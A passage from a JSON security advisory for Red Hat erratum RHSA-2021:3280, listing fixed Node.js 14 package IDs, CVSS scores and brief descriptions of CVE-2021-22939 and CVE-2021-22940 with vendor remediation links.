"7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3280" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.0, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs: Improper handling of untypical characters in domain names" }, { "cve": "CVE-2021-22939", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-08-12T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1993039" } ], "notes": [ { "category": "description", "text": "A flaw was found in Node.js. If the Node.js HTTPS API is used incorrectly and \"undefined\" is passed for the \"rejectUnauthorized\" parameter, no error is returned, and the connections to servers with an expired certificate are accepted. The highest threat from this vulnerability is to integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: Incomplete validation of tls rejectUnauthorized parameter", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay from version 3.4 consumes nodejs from RHEL, so security tracking is provided by the container health index on the customer portal [1]. Additionally there is no impact from this issue on Quay 3.3 and 3.2 because nodejs is only used at build time and is no longer shipped, starting with Quay 3.5 [2].\n[1] https://catalog.redhat.com/software/containers/quay/quay-rhel8/600e03aadd19c7786c43ae49?container-tabs=security\n[2] https://issues.redhat.com/browse/PROJQUAY-1409\nTherefore Quay component is marked as \"Will not fix\".", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "known_not_affected": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22939" }, { "category": "external", "summary": "RHBZ#1993039", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1993039" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22939", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22939" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22939", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22939" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/aug-2021-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/aug-2021-security-releases/" } ], "release_date": "2021-08-11T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:21:32+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3280" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs: Incomplete validation of tls rejectUnauthorized parameter" }, { "cve": "CVE-2021-22940", "cwe": { "id": "CWE-416", "name": "Use After Free" }, "discovery_date": "2021-08-12T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1993029" } ], "notes": [ { "category": "description", "text": "A flaw was found in Node.js, where it is vulnerable to a use-after-free attack. This flaw allows an attacker to exploit memory corruption to change process behavior. The highest threat from this vulnerability is to confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: Use-after-free on close http2 on stream canceling", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue is a follow-up to CVE-2021-22930, as the issue was not completely resolved in the fix for CVE-2021-22930. Node.js as shipped in Red Hat Enterprise Linux 8 streams and Red Hat Software Collections is not explicitly affected by the incomplete fix because the incomplete fix was not released, but the original issue does affect these components.\n\nRed Hat Quay from version 3.4 consumes nodejs from RHEL, so security tracking is provided by the container health index on the customer portal [1]. Additionally there is no impact from this issue on Quay 3.3 and 3.2 because nodejs is only used at build time and is no longer shipped, starting with Quay 3.5 [2].\n[1] https://catalog.redhat.com/software/containers/quay/quay-rhel8/600e03aadd19c7786c43ae49?container-tabs=security\n[2] https://issues.redhat.com/browse/PROJQUAY-1409\nTherefore Quay component is marked as \"Will not fix\" with impact LOW.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", 